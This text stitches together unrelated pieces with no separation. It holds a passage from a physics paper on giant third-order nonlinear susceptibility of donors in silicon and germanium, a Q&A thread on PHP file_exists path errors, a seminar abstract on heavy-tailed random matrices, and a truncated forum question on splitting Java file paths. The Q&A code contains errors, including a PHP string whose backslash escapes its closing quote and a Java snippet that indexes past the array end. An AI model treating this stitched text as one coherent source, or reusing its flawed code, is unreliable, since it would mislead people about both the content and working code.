in the E.r gauge, which may be written as M(2) = 〈ψe|ζG1ζ|ψg〉 where $$\zeta = {\boldsymbol{\epsilon }}.{\boldsymbol{r}}/a_B$$,
$$G_n = \frac{{E_H}}{\hbar }\mathop {\sum }\limits_j \frac{{\left| j \right\rangle \left\langle j \right|}}{{\left( {\omega _{jg} - n\omega } \right)}}$$
(2)
and ω = ωeg/N. The states |j〉 are intermediate states, and along with |ψe〉 & |ψg〉 they are eigenstates of $$H\left| j \right\rangle = \hbar \omega _j\left| j \right\rangle$$, where H is the Hamiltonian in the dark. For general multiphoton absorption,
$$M^{(N \ge 2)} = \left\langle {\psi _e\left| {\zeta G_{N - 1}\zeta \ldots \zeta G_2\zeta G_1\zeta } \right|\psi _g} \right\rangle$$
(3)
The summation in Eq. (2) can be avoided11 by noticing that (HWn)Gn = EH, where Wn = ωg + nω, and ω = ωeg/N as already mentioned, and by using the completeness relation $$\mathop {\sum}\nolimits_j {\left| j \right\rangle \left\langle j \right|} = 1$$. In other words,
$$G_n = E_H\left( {H - W_n} \right)^{ - 1}$$
(4)
Rewriting Eq. (3), M(N) = 〈ψe|ζ|ψN−1〉 where |ψ0〉 = |ψg〉 and |ψn〉 is the solution of the partial differential equation (PDE) $$G_n^{ - 1}\left| {\psi _n} \right\rangle = \zeta \left| {\psi _{n - 1}} \right\rangle$$. Instead of finding M(N) by repeated application of Eq. (2), which requires infinite sums (that might be reduced down to a few terms if there are obvious resonances), we may now use Eq. (4) and the PDE at each stage, which can be simpler.
The Nth-order susceptibility far from any multiphoton resonances may also be calculated using the Nth-order perturbation theory13. For example, the “resonant” term in the third-order susceptibility, χ(3)(3ω), is
$$\frac{{n_{\text{3D}}e^4}}{{\epsilon _0\hbar ^3}}\mathop {\sum }\limits_{l,k,j} \frac{{\left\langle {\psi _g\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|l} \right\rangle \left\langle {l\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|k} \right\rangle \left\langle {k\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|j} \right\rangle \left\langle {j\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|\psi _g} \right\rangle }}{{(\omega _{lg } - 3\omega )(\omega _{kg} - 2\omega )(\omega _{jg} - \omega )}}$$
where e is the electron charge, and n3D is the concentration. χ(3) may be written in a similar form to Eqs (1) and (3), and for Nth order,
$$\chi ^{(N)} = C^{(N)}\left[ {\frac{{a_B}}{{I_a^{N/2}}}} \right]\frac{{n_{\text{3D}}e^{N + 1}}}{{\hbar ^{N/2}\epsilon _0}}$$
(5)
where C(N) = 〈ψg|ζGNG2ζG1ζ|ψg〉 is a dimensionless matrix element that may be found in a similar way to M(N), either by repeated application of Eq. (2)—as has been done previously for alkali metal vapors6—or by using the implicit summation method of Eq. (4) with the only difference being ωωeg/N. The antiresonant terms13 and other non-linear processes, such as sum-frequency generation, can be calculated with simple modifications to Wn at each step.
### Multi-valley theory for donors in silicon and germanium
In this section, we develop the multi-valley theory for the nonlinear optical processes of donors based on the effective mass approximation (EMA). For simplicity of presentation, we describe the derivation for silicon; the case of germanium is discussed in the Supplementary Materials. It will become apparent that our theory is readily applicable to any donor in any host as long as the EMA is reliable.
To apply the method to donors, we require |ψg〉, ωg, |ψe〉, ωe and H|ψn〉. Silicon and germanium are indirect with equivalent conduction band minima (valleys) near the Brillouin zone edge; each minimum is characterized by a Fermi surface that is a prolate ellipsoid with transverse & longitudinal effective masses, mt,l. According to the Kohn-Luttinger effective mass approximation14, the state |ψj〉 of a shallow donor can be decomposed into slowly varying hydrogenic envelope functions, one for each valley, modulated by plane-wave functions corresponding to the crystal momenta at the minima, kμ (and a lattice periodic function that is unimportant here). We write $$\psi _j({\boldsymbol{r}}) = \mathop {\sum}\nolimits_\mu {e^{i{\boldsymbol{k}}_\mu .{\boldsymbol{r}}}F_{j,\mu }({\boldsymbol{r}})}$$ where Fj,μ(r) is the slowly varying envelope function. We have neglected the lattice periodic part, uμ(r), of the Bloch functions for the simplicity of presentation. A rigorous derivation with uμ(r) included is provided in the Supplementary Materials, but it does not lead to any change in the final equations for the envelope functions (Eqs (7) and (8) below).
We separate the potential into the slowly varying Coulomb term of the donor V(r), and a rapidly varying term due to the quantum defect that is short range, U(r), referred to as the central cell correction (CCC). Within the EMA, the kinetic energy term in the Hamiltonian operates only on the envelope function, and the EMA Schrodinger equation may be written as
$$\mathop {\sum}\limits_\mu {e^{i{\boldsymbol{k}}_\mu .{\boldsymbol{r}}}} \left[ {H_0 + U - \hbar \omega _j} \right]F_{j,\mu }(r) = 0$$
(6)
where H0 includes the Coulomb potential V(r): $$E_H^{ - 1}H_0 = - \frac{1}{2}a_B^2\left[ {\partial _x^2 + \partial _y^2 + \gamma \partial _z^2} \right] - a_Br^{ - 1}$$ using a valley-specific coordinate system (x, y, z where z is the valley axis, i.e., the valley-frame is rotated relative to the lab-frame of x1, x2, x3). The kinetic energy has cylindrical symmetry because γ = mt/ml ≠ 1, and V(r) and U(r) are spherical and tetrahedral respectively. H0 produces wave functions that are approximately hydrogen-like, and U(r) mixes them to produce states that transform as the A1, E and T2 components of the Td point group.
We take U(r) to be very short range, and we neglect the small change in the envelope functions over the short length scale 2π/|kμ|. Premultiplying Eq. (6) by $$e^{ - i{\boldsymbol{k}}_{\mu \prime }.{\boldsymbol{r}}}$$ and averaging over a volume (2π/|kμ|)3 around r, the Schrodinger eqn now reads $$\left[ {H_0 - \hbar \omega _j} \right]F_{j,\mu }({\boldsymbol{r}}) + \mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }\delta ({\boldsymbol{r}})F_{j,\mu \prime }({\boldsymbol{r}})} = 0$$, where δ(r) is the Dirac delta function, and $$U_{\mu \mu \prime } = {\int} {d{\boldsymbol{r}}{\kern 1pt} e^{i({\boldsymbol{k}}_{\mu \prime } - {\boldsymbol{k}}_\mu ).{\boldsymbol{r}}}U({\boldsymbol{r}})}$$. For an A1 state, all the envelope functions have the same amplitude at r = 0, hence, $$\mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }\delta ({\boldsymbol{r}})F_{j,\mu \prime }({\boldsymbol{r}})} = - U_{cc}\delta ({\boldsymbol{r}})F_{j,\mu }({\boldsymbol{r}})$$, where $$U_{cc} = - \mathop {\sum}\nolimits_{\mu \prime } {U_{\mu \mu \prime }}$$. It is found experimentally that for E and T2 states, the CCC has a rather small effect, and so we neglect it. Since H0 has cylindrical symmetry, the component of angular momentum about the valley axis is a conserved quantity, i.e., Fj,μ(r) = eimϕfj,m,μ(r, θ), where m is a good quantum number, and now fj,m,μ is a 2D function only. Substituting into the Schrodinger eqn, premultiplying by eimϕ and finally integrating over ϕ, the eigenproblems are
$$\begin{array}{*{20}{l}} {\left[ {H_0^{(m)} - U_{cc}\delta (r) - \hbar \omega _j} \right]f_{j,m,\mu }^{(A_1)}(r,\theta )} \hfill & = \hfill & {0} \hfill \\ {\left[ {H_0^{(m)} - \hbar \omega _j} \right]f_{j,m,\mu }^{(E,T_2)}(r,\theta )} \hfill & = \hfill & {0} \hfill \end{array}$$
(7)
where $$H_0^{(m)} = H_0 + E_Ha_B^2m^2$$/2(r sin θ)2. We solve Eq. (7) using a 2D finite element method (FEM) (see Supplementary Materials).
We focus on silicon, in which case the valley index, μ, runs over (±1, ±2, ±3), where 1, 2, 3 are the three crystal axes, and we let the light be polarized along a crystal axis, x1, by way of illustration; the calculation for germanium and other polarization directions is described in the Supplementary Materials. For the μ = ±1, ±2, ±3 valleys, aBζμ = z, x, y = r cos θ, r sin θ cos ϕ, r sin θ sin ϕ, respectively, because each has its coordinate rotated so that z is the valley axis. Following the expansion of ψj in terms of the fj,m,μ, we write the intermediate state functions as $$\psi _n({\boldsymbol{r}}) = \mathop {\sum}\nolimits_{m,\mu } {e^{im\phi }e^{i{\boldsymbol{k}}_\mu .{\boldsymbol{r}}}f_{n,m,\mu }(r,\theta )}$$, substitute them into $$G_n^{ - 1}\psi _n = \zeta \psi _{n - 1}$$, premultiply by $$e^{ - i{\boldsymbol{k}}_{\mu \prime }.{\boldsymbol{r}}}$$, average over a volume of (2π/|kμ|)3, premultiply by eimϕ, and finally, integrate over ϕ. Since f0,0,μ = fg,0,μ for all μ, we find that fn,m,3 = imfn,m,2 and fn,m,−μ = fn,m,μ, and
$$\begin{array}{*{20}{l}} {\left[ {H_0^{(m)} - W_n - {\cal{D}}} \right]f_{n,m,1} - 2{\cal{D}}f_{n,m,2} = (E_H/a_B){\kern 1pt} r{\kern 1pt} {\mathrm{cos}}{\kern 1pt} \theta f_{n - 1,m,1}} \hfill \\ {\left[ {H_0^{(m)} - W_n - 2{\cal{D}}} \right]f_{n,m,2} - {\cal{D}}f_{n,m,1} = (E_H/a_B){\kern 1pt} r{\kern 1pt} {\mathrm{sin}}{\kern 1pt} \theta \left[ {f_{n - 1,m - 1,2} + f_{n - 1,m + 1,2}} \right]/2} \hfill \end{array}$$
(8)
where $${\cal{D}} = U_{cc}\delta ({\boldsymbol{r}})\delta _{m,0}/3$$ and δm,0 is the Kronecker delta. In the above equations we drop the valley-specific coordinates in fn,m,μ for notational simplicity, and the coordinates in $$H_0^{(m)}$$ and the right hand side are understood to belong to the valley of the envelope function that they act on.
It is evident that Eq. (8) are not coupled by Ucc when the envelope function is zero at the origin. The ground state |ψ0〉 = |ψg〉 has only m = 0 components, and it has even parity. Therefore, |ψ1〉 has odd parity according to Eq. (8), so the Ucc coupling term is suppressed. By the same logic, the Ucc coupling is only non-zero for even n and m = 0. In the case of $$\left| {f_{n,m,1}} \right\rangle$$, there is only dipole coupling to the functions with the same m, while for $$\left| {f_{n,m,2}} \right\rangle$$ the dipole coupling is to states with Δm = ±1. The latter couplings are identical, so fn,−m,μ = fn,m,μ. Figure 1 shows how the intermediate states are coupled by dipole excitation and the CCC.
Equation (8) can be solved by sequential application of the 2D FEM15. To test our numerical calculation we first compute C(3) for hydrogen, and each of the resonant and antiresonant terms is shown in Fig. 2. Their sum is shown in Fig. 3, and we find excellent agreement within 0.2% of the previous result obtained from a Sturmian coulomb Green function in ref. 16.
## Discussion
### Giant third-order nonlinear susceptibility
Since silicon and germanium donors have an isotropic potential in an isotropic dielectric, the lowest-order nonlinear response is determined by χ(3). The χ(3) spectrum for each (including the antiresonant terms) is shown in Fig. 3. We took the parameters for silicon obtained from spectroscopic17 and magneto-optical measurements12,18, which are γ ≈ 0.208, aB ≈ 3.17 nm and EH ≈ 39.9 meV. The parameters for germanium are γ ≈ 0.0513, aB ≈ 9.97 nm and EH ≈ 9.40 meV19. Resonances occur when 3ω = ωeg, labeled according to |ψe〉, and there are also sign-changes at which |χ(3)| goes to zero. In the range of frequency shown, we also observe a two-photon resonance for 1sA1 → 1sE, which is an obvious illustration of the need for a multivalley theory. There is no 3ω resonance with 1sT2 within the approximations made above in which there is no intervalley dipole coupling. The effect of Ucc on χ(3) and the NPA matrix element is shown in Fig. 4. The low-frequency response of C(3) is illustrated at 100 GHz. Two higher-frequency curves are included, with both far from 3ω resonances, half way between the 2p0 and 2p± resonances, and between the 3p0 and 3p±. We choose these average frequencies since χ(3) for Si:P varies slowly around them (see Fig. 3) and hence would not be sensitive to small experimental variations in the light frequency. For the 2p-average frequency, the 2ω resonance with the 1sE produces a coincidental zero-crossing for Si:Bi. Example results for the intermediate state wave functions produced in the calculation are shown in Fig. 5. The state |ψ2〉 is much larger in extent (and in magnitude) than |ψ0〉, and the extra node in the radial dependence due to the contribution of 2s is visible at about 5 nm. Similarly, the state |ψ3〉 is much larger in extent (and in magnitude) than |ψ1〉.
The square bracket in Eq. (5) gives the scaling of χ(N) from hydrogenic atoms in vacuum to hydrogenic impurities in semiconductors, just as that in Eq. (1) does for w(N), and as before, the much smaller Ia greatly increases the strength of the non-linearity. For example, the low-frequency limit of the hyperpolarizability χ(3)/n3D for Si:P is much larger than that for hydrogen or alkali metal vapors such as Rb6, as shown in Fig. 3.
Some of the highest values of χ(3) have been reported for solids, e.g., 2.8 × 10−15 m2/V2 for InSb20 and 2 × 10−16 m2/V2 for GaTe21. To convert the hyperpolarizability to a bulk χ(3) value requires the concentration. To match InSb with Si:P at low frequency where C(3) ≈ 1 (Fig. 4) (and χ(3)/n3D = 2.9 × 10−38 m5/V2) requires a donor density of n3D = 1017 cm−3 (where the donor–donor distance is 10aB). At high frequency, the hyperpolarizability is much higher, but the density should be lower to avoid inhomogeneous concentration broadening of the nearby excited levels. For example, C(3) ≈ 20 between the 2p0 and 2p± resonances at $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$ (Fig. 4), and we match InSb at a density of n3D = 5 × 1015 cm−3 at which concentration the 2p lines are well resolved22. If 3ω is moved even closer to the 2p± resonance (or if the resonance is tuned with a magnetic field18), then χ(3) could easily exceed InSb. Losses due to dephasing by phonon scattering may become important if the time spent in the intermediate states exceeds the phonon lifetime. Since the inverse of the former is given approximately by the detuning (ΔfΔt ≥ 1/2π) and the inverse phonon-limited width (1/πT2 = 1 GHz23,24), then this loss is negligible for much of the spectrum. At 50 GHz below the 2p± line so that such losses may be ignored, C(3) ≈ 200, and χ(3) is an order of magnitude above InSb.
We are not aware of any larger values for bulk media, but higher “bulk” values have been reported for 2D systems such as graphene and MoS2 for which χ(3)L data are divided by an interaction thickness L to obtain χ(3); in particular, reports for graphene range from 10−1925,26 to 10−15 m2/V227 for near-IR excitation and up to 10−10 m2/V2 in the THz region under resonant enhancement by landau levels in a magnetic field28. A recent experiment with single-layer graphene at room temperature reports a remarkably high value of 1.7 × 10−9 m2/V2 for the THz third-order nonlinear susceptibility29. In the case of coupled quantum wells (QW), large values of χ(3) may be engineered through resonances, as demonstrated up to 10−14 m2/V230. However, since the non-linear effect is limited by the interaction length, the 2D χ(3)L is probably a better figure of merit in these cases. For THz field-enhanced graphene with 50 layers, χ(3)L = 9 × 10−20 m3/V2 28, and for single-layer graphene χ(3)L = 5.1 × 10−19 m3/V229, or χ(3)L = 1.4 × 10−18 m3/V2 for resonant coupled QWs30. Even higher values are predicted for doped QWs up to χ(3)L = 5 × 10−17 m3/V2 31. To match this value with Si:P at $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$ and n3D = 5 × 1015 cm−3 (see above) would require a sample thickness of L = 2 cm. Obviously, the required thickness can be significantly reduced when close to resonance, or for germanium.
### Efficient third-harmonic generation
The non-linear susceptibility is important for predicting the strength of frequency conversion processes such as third-harmonic generation (3HG), and we use this as an example application to investigate the utility of the medium. A solution for the amplitude of the generated wave produced by 3HG, neglecting absorption, is given by32. Converting to irradiance in MKS units,
$$\frac{{I_{{\mathrm{out}}}}}{{I_{{\mathrm{in}}}}} = \left( {\frac{{3\omega _{{\mathrm{in}}}\chi ^{(3)}LI_{{\mathrm{in}}}}}{{4\epsilon _0n^2c^2}}} \right)^2 = \left( {\frac{{I_{{\mathrm{in}}}f_{{\mathrm{in}}}n_{2{\mathrm{D}}}}}{x}C^{(3)}} \right)^2$$
(9)
where Iin is the irradiance of the input pump wave at frequency fin, and n is the geometric mean of the refractive indexes for the input and output waves, and n2D = n3DL. Note that the isotropy mentioned earlier means that the polarization of the input and output waves must be parallel. We ignored a factor for the phase matching, which is unity if the length of the sample LLc, where the coherence length Lc = πc/(3ωin[nout − nin]). Si:P at room temperature has a nearly constant n = 3.4153 in the range from 1 THz to 12 THz33, leading to typical values of Lc ≈ 10 cm. The factor x = 6.9 × 1023 W/cm2 × THz × cm−2 for silicon. For comparison, germanium has x = 9.2 × 1019 W/cm2 × THz × cm−2.
To illustrate the possible applications of this high χ(N), we note that two types of THz diode lasers are available, the quantum cascade laser (QCL) from 0.74 THz34 to 5.4 THz35 with output powers of up to a few W36,37, and the hot hole (p-Ge) laser38,39 with a similar range and power. However, there is a large gap in the availability of solid-state sources from about 5 THz to about 12 THz40, where the GaAs Reststrahlen band renders laser operation impossible. This is an important region for quantum qubit applications41,42,43,44. Currently, the gap is only filled by larger, more expensive systems (difference frequency generators and free electron lasers). Tripling the output of 2–4 THz QCLs would fill the gap, but their output powers are far smaller than those typical for a pump laser in standard tripling applications, so a giant non-linearity is critical. At $$\omega = \bar \omega _{2p}/3 = 2\pi \times 3.2\,{\text{THz}}$$, C(3) ≈ 20, so for n2D = 1016 cm−2 (see above), a 1% predicted conversion may be obtained with 100 kW/cm2, and by moving to 50 GHz below the 2p± resonance this value could be brought down to 10 kW/cm2, which is just about achievable with a well focussed QCL, and would thus provide enough output for spectroscopy applications. A nonlinear process that may possibly reduce the 3HG efficiency is multiphoton ionization45 since it reduces the population of the donors in the ground state. When $$\omega = \bar \omega _{2p}/3$$, for example, a four-photon absorption takes the electron to the continuum. We estimate this ionization in Si:P using the implicit summation method and find that the rate is w = 3.17 s−1 for Iin = 10 kW/cm2. This result simply means that the pulses must be kept significantly shorter than a second to avoid significant ionization.
In summary, we calculated the absolute values of the THz non-linear coefficients for the most common semiconductor materials, lightly doped silicon and germanium, which are available in the largest, purest and most regular single crystals known. The values we obtain for off-resonance rival the highest values obtained in any other material even when resonantly enhanced, and the material could gain new applications in THz photonics. We also predict the highly efficient third-harmonic generation of THz light in doped silicon and germanium. Our multi-valley theory for nonlinear optical processes of donors in silicon and germanium can be readily applied to any donor in any semiconductor host in which the effective mass approximation is reliable.
## Materials and methods
Details of the finite element computation used for solving the coupled partial differential equations (Eq. (8)) are provided in the Supplementary Material.
## Data availability
Data for Nguyen Le et al. Giant non-linear susceptibility of hydrogenic donors in silicon and germanium, https://doi.org/10.5281/zenodo.3269481. The data underlying this work is available without restriction.
## References
1. 1.
Kaiser, W. & Garrett, C. G. B. Two-photon excitation in CaF2: Eu2+. Phys. Rev. Lett. 7, 229–231 (1961).
2. 2.
Abella, I. D. Optical double-photon absorption in cesium vapor. Phys. Rev. Lett. 9, 453–455 (1962).
3. 3.
Saha, K. et al. Enhanced two-photon absorption in a hollow-core photonic-band-gap fiber. Phys. Rev. A 83, 033833 (2011).
4. 4.
Franken, P. A. et al. Generation of optical harmonics. Phys. Rev. Lett. 7, 118–119 (1961).
5. 5.
Ward, J. F. & New, G. H. C. Optical third harmonic generation in gases by a focused laser beam. Phys. Rev. 185, 57–72 (1969).
6. 6.
Miles, R. & Harris, S. Optical third-harmonic generation in alkali metal vapors. IEEE J. Quantum Electron. 9, 470–484 (1973).
7. 7.
Van Loon, M. A. W. et al. Giant multiphoton absorption for THz resonances in silicon hydrogenic donors. Nat. Photonics 12, 179–184 (2018).
8. 8.
Vampa, G. et al. Theoretical analysis of high-harmonic generation in solids. Phys. Rev. Lett. 113, 073901 (2014).
9. 9.
Beaulieu, S. et al. Role of excited states in high-order harmonic generation. Phys. Rev. Lett. 117, 203001 (2016).
10. 10.
Haworth, C. A. et al. Half-cycle cutoffs in harmonic spectra and robust carrier-envelope phase retrieval. Nat. Phys. 3, 52–57 (2007).
11. 11.
Gontier, Y. & Trahin, M. On the multiphoton absorption in atomic hydrogen. Phys. Lett. A 36, 463–464 (1971).
12. 12.
Li, J. et al. Radii of Rydberg states of isolated silicon donors. Phys. Rev. B 98, 085423 (2018).
13. 13.
Boyd, R. W. Nonlinear Optics. 3rd edn, 640. Academic Press, New York (2008).
14. 14.
Kohn, W. & Luttinger, J. M. Theory of donor states in silicon. Phys. Rev. 98, 915–922 (1955).
15. 15.
The Mathematica FEM code used in this paper is available at, https://github.com/lehnqt/chi3.git.
16. 16.
Mizuno, J. Use of the sturmian function for the calculation of the third harmonic generation coefficient of the hydrogen atom. J. Phys. B: At. Mol. Phys. 5, 1149–1154 (1972).
17. 17.
Ramdas, A. K. & Rodriguez, S. Review article: spectroscopy of the solid-state analogues of the hydrogen atom: donors and acceptors in semiconductors. Rep. Prog. Phys. 44, 1297–1387 (1981).
18. 18.
Murdin, B. N. et al. Si:P as a laboratory analogue for hydrogen on high magnetic field white dwarf stars. Nat. Commun. 4, 1469 (2013).
19. 19.
Faulkner, R. A. Higher donor excited states for prolate-spheroid conduction bands: a reevaluation of silicon and germanium. Phys. Rev. 184, 713–721 (1969).
20. 20.
Yuen, S. Y. & Wolff, P. A. Difference-frequency variation of the free-carrier-induced, third-order nonlinear susceptibility in n-InSb. Appl. Phys. Lett. 40, 457–459 (1982).
21. 21.
Susoma, J. et al. Second and third harmonic generation in few-layer gallium telluride characterized by multiphoton microscopy. Appl. Phys. Lett. 108, 073103 (2016).
22. 22.
Thomas, G. A. et al. Optical study of interacting donors in semiconductors. Phys. Rev. B 23, 5472–5494 (1981).
23. 23.
Steger, M. et al. Shallow impurity absorption spectroscopy in isotopically enriched silicon. Phys. Rev. B 79, 205210 (2009).
24. 24.
Greenland, P. T. et al. Coherent control of Rydberg states in silicon. Nature 465, 1057–1061 (2010).
25. 25.
Woodward, R. I. et al. Characterization of the second- and third-order nonlinear optical susceptibilities of monolayer MoS2 using multiphoton microscopy. 2D Mater. 4, 11006 (2017).
26. 26.
Karvonen, L. et al. Rapid visualization of grain boundaries in monolayer MoS2 by multiphoton microscopy. Nat. Commun. 8, 15714 (2017).
27. 27.
Säynätjoki, A. et al. Rapid large-area multiphoton microscopy for characterization of graphene. ACS Nano 7, 8441–8446 (2013).
28. 28.
König-Otto, J. C. et al. Four-wave mixing in landau-quantized graphene. Nano Lett. 17, 2184–2188 (2017).
29. 29.
Hafez, H. A. et al. Extremely efficient terahertz high-harmonic generation in graphene by hot Dirac fermions. Nature 561, 507–511 (2018).
30. 30.
Sirtori, C. et al. Giant, triply resonant, third-order nonlinear susceptibility $$\chi _{3\omega }^{(3)}$$ in coupled quantum wells. Phys. Rev. Lett. 68, 1010–1013 (1992).
31. 31.
Yildirim, H. & Aslan, B. Donor-related third-order optical nonlinearites in GaAs/AlGaAs quantum wells at the THz region. Semicond. Sci. Technol. 26, 085017 (2011).
32. 32.
Shen, Y. R. The Principles of Nonlinear Optics. 3rd edn, 576. Wiley-Interscience, New York, 2002.
33. 33.
Chick, S. et al. Metrology of complex refractive index for solids in the terahertz regime using frequency domain spectroscopy. Metrologia 55, 771 (2018).
34. 34.
Scalari, G. et al. Magnetically assisted quantum cascade laser emitting from 740GHz to 1.4THz. Appl. Phys. Lett. 97, 081110 (2010).
35. 35.
Wienold, M. et al. Frequency dependence of the maximum operating temperature for quantum-cascade lasers up to 5.4 THz. Appl. Phys. Lett. 107, 202101 (2015).
36. 36.
Li, L. et al. Terahertz quantum cascade lasers with >1 W output powers. Electron. Lett. 50, 4309 (2014).
37. 37.
Li, L. H. et al. Multi-Watt high-power THz frequency quantum cascade lasers. Electron. Lett. 53, 799 (2017).
38. 38.
Pfeffer, P. et al. p-type Ge cyclotron-resonance laser: Theory and experiment. Phys. Rev. B 47, 4522–4531 (1993).
39. 39.
Hübers, H. W., Pavlov, S. G. & Shastin, V. N. Terahertz lasers based on germanium and silicon. Semicond. Sci. Technol. 20, S211–S221 (2005).
40. 40.
Ohtani, K., Beck, M. & Faist, J. Double metal waveguide InGaAs/AlInAs quantum cascade lasers emitting at 24 μm. Appl. Phys. Lett. 105, 121115 (2014).
41. 41.
Saeedi, K. et al. Optical pumping and readout of bismuth hyperfine states in silicon for atomic clock applications. Sci. Rep. 5, 10493 (2015).
42. 42.
Litvinenko, K. L. et al. Coherent creation and destruction of orbital wavepackets in Si:P with electrical and optical read-out. Nat. Commun. 6, 6549 (2015).
43. 43.
Chick, S. et al. Coherent superpositions of three states for phosphorous donors in silicon prepared using THz radiation. Nat. Commun. 8, 16038 (2017).
44. 44.
Stoneham, A. M. et al. Letter to the editor: optically driven silicon-based quantum gates with potential for high-temperature operation. J. Phys.: Condens. Matter 15, L447–L451 (2003).
45. 45.
Bebb, H. B. & Gold, A. Multiphoton ionization of hydrogen and rare-gas atoms. Phys. Rev. 143, 1–24 (1966).
## Acknowledgements
We acknowledge financial support from the UK Engineering and Physical Sciences Research Council [ADDRFSS, Grant No. EP/M009564/1] and EPSRC strategic equipment grant no. EP/L02263X/1.
## Author information
Authors
### Contributions
N.H. Le and B.N. Murdin worked on the multivalley theory and the finite element calculation of the third-order susceptibility. B.N. Murdin and G.V. Lanskii calculated the third-harmonic generation efficiency. B.N. Murdin, N.H. Le and G. Aeppli wrote the manuscript. All authors contributed to the discussion of the results.
### Corresponding author
Correspondence to Benedict N. Murdin.
## Ethics declarations
### Conflict of interest
The authors declare that they have no conflict of interest.
## Rights and permissions
Reprints and Permissions
Le, N.H., Lanskii, G.V., Aeppli, G. et al. Giant non-linear susceptibility of hydrogenic donors in silicon and germanium. Light Sci Appl 8, 64 (2019). https://doi.org/10.1038/s41377-019-0174-6 |
PHP file_exists($var) not working I'm trying to write some code on my notebook and am using the xampp environment. I have the following piece of code: class A { ... foreach ($blocks as $block) {$block = 'dir/dir2/' . $block; } if (file_exists($block) == true) {
$var .= file_get_contents($block);
}
}
When I echo the $block variable in the foreach loop, it gives back the path to the files. However, the file_exists function always returns false. Could you please help me figure out what's wrong here? - 8 Answers file_exists purpose is to check if the supplied file exists. It's returning false. This means that the your file doesn't exist where php is looking. php might be looking in a different area than you expect. Looks like it's time for some debugging. Run this to figure out where php is looking. echo "current working directory is -> ". getcwd(); Is that where you want php to look? If not then change the directory php is looking in with the chdir function. $searchdirectory = "c:\path\to\your\directory"; //use unix style paths if necessary
chdir($searchdirectory); Then run your function (note: I flipped the slashes to backslashes in order to be consistent with windows style paths.) class A { ... //change working directory$searchdirectory = "c:\path\to\your\directory"; //use unix style paths if necessary
chdir($searchdirectory); foreach ($blocks as $block) {$block = 'dir\dir2\' . $block; if (file_exists($block) == true) {
$var .= file_get_contents($block);
}
}
}
-
Quoting someones comment on the php file_exists manual page,
Be aware: If you pass a relative path to file_exists, it will return false unless the path happens to be relative to the "current PHP dir" (see chdir() ).
In other words, if your path is relative to the current files directory, you should append dirname(__FILE__) to your relative paths, or as of PHP 5.3, you can just use __DIR__.
-
TJM, if I add DIR, the echo gives me "C:\xampp\htdocs/dir/dir2" and the file_exists still doesn't work. – Alex May 28 '11 at 15:20
@Alex you're mixing unix and windows style paths, use dir\dir2 instead – onteria_ May 28 '11 at 15:50
Ah yeah, I assumed linux based on your paths, as onteria_ says, changing your path separator should fix it. – tjm May 28 '11 at 15:54
Thanks. Sorry for a totally dumb question but what would be the best way to do that so that I won't have to rewrite the slashes when I deploy the code on the server? – Alex May 28 '11 at 16:07
@jeremysawesome @Alex the DIRECTORY_SEPARATOR constant – Wiseguy May 28 '11 at 16:24
It may be too late but just found its solution after banging my head for last 2 hrs. In case you are using windows, it hides file name extension by default. So a.txt will be displayed as a and the file which is displayed as a.txt is actually a.txt.txt . To view file extensions go to Control Panel -> Appereances And Personalization -> Folder Option -> View
and uncheck hide file name extension. Now you can see the true name which is to be used in file_exists().
-
You are mixing slashes, this one drove me nuts.
Here is the solution:
echo getcwd();
$searchimg = getcwd().'\\public\\images\\pics\\'.$value['name'].'.'.$value['ext']; You will need to quote the slashes like that all the way to the picture :) - As far as I see, you are using file_exists outside the foreach loop. Hence the $block variable is not bound at the time.
EDIT: actually it is still bound to the last value in your collection.
-
It is bound, but it holds the value of the last iteration in the loop. This item happens not to exist, so it appears that file_exists "always" returns false. – PreferenceBean May 28 '11 at 15:12
Thanks, Tomalak, indeed it holds the last value! – naivists May 28 '11 at 15:14
TJM, if I add DIR, the echo gives me "C:\xampp\htdocs/dir/dir2" and the file_exists still doesn't work. – Alex May 28 '11 at 15:19
@Alex: Then the path doesn't exist. Not a huge surprise since you're mixing slashes. – PreferenceBean May 28 '11 at 15:54
Thanks, Tomalak. Trying to figure out how to change the slashes when calling DIR without having to recode everything when I deploy the code online. – Alex May 28 '11 at 16:09
Do you intend to check file_exists() inside the foreach loop?
class A {
...
foreach ($blocks as$block) {
$block = 'dir/dir2/' .$block;
// Inside the loop
if (file_exists($block) == true) {$var .= file_get_contents($block); } } } - Yes, Michael. That's the idea. – Alex May 28 '11 at 15:24 i guess that the check of file_exists work a bit different from opening with file_get_contents. so i maye it could be one of these problems: • file_exists: returns FALSE if inaccessible due to safe mode restrictions • file_exists: for checking it uses the real UID/GID and not the effective rights • file_get_contents: uses a protocol with file_exists does not know.. maybe it helps you further! good luck - If you use a variable for your file, make sure that there are no blank space at the end. I went mad until i found the solution : removing blank with trim(). See below. if file_exists(trim($Filename))
- |
Mathematics Colloquia and Seminars
Take a square $N\times N$ symmetric matrix $X_N$ with real i.i.d random entries above the diagonal with law $\mu$ such that $\mu(x2)=1$. Then, if $\lambda_i, 1\le i\le N$ denote the eigenvalues of $X_N$, Wigner's theorem asserts that the spectral measure $N^{-1}\sum_{i=1}^N \delta_{\lambda_i/sqrt{N}}$ converges weakly in expectation and almost surely towards the semi-circle law. We study what happens when $\mu$ has no finite second moment, but belong to the domain of attraction of an $\alpha$-stable law. In particular, we show the weak convergence of $\E[N^{-1}\sum_{i=1}^N \delta_{\lambda_i /N^{1/\alpha}}]$ towards a symmetric law with heavy tail. |
Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium
x
Solved
# java string.split file directory path
Posted on 2011-03-01
Medium Priority
2,951 Views
Hello
Trying to return the file name from a the directory path:
Its not splitting the string at all.
public String getFilenameFromFile(String file)
{
String delims = "[\\]"; < -- when I debug this is the symbol seperating the folders
String[] tokens = file.split(delims);
int num = tokens.length;
String lfilename = tokens[num].toString();
return filename;
}
0
Question by:AndyC1000
• 3
LVL 40
Expert Comment
ID: 35013841
can you print the 'file' variable contents?
0
LVL 47
Expert Comment
ID: 35013852
http://stackoverflow.com/questions/1099859/how-to-split-a-path-platform-independent
offer
this solution:
String[] subDirs = path.split(Pattern.quote(File.separator));
0
LVL 47
Accepted Solution
for_yan earned 332 total points
ID: 35013876
And I tested it
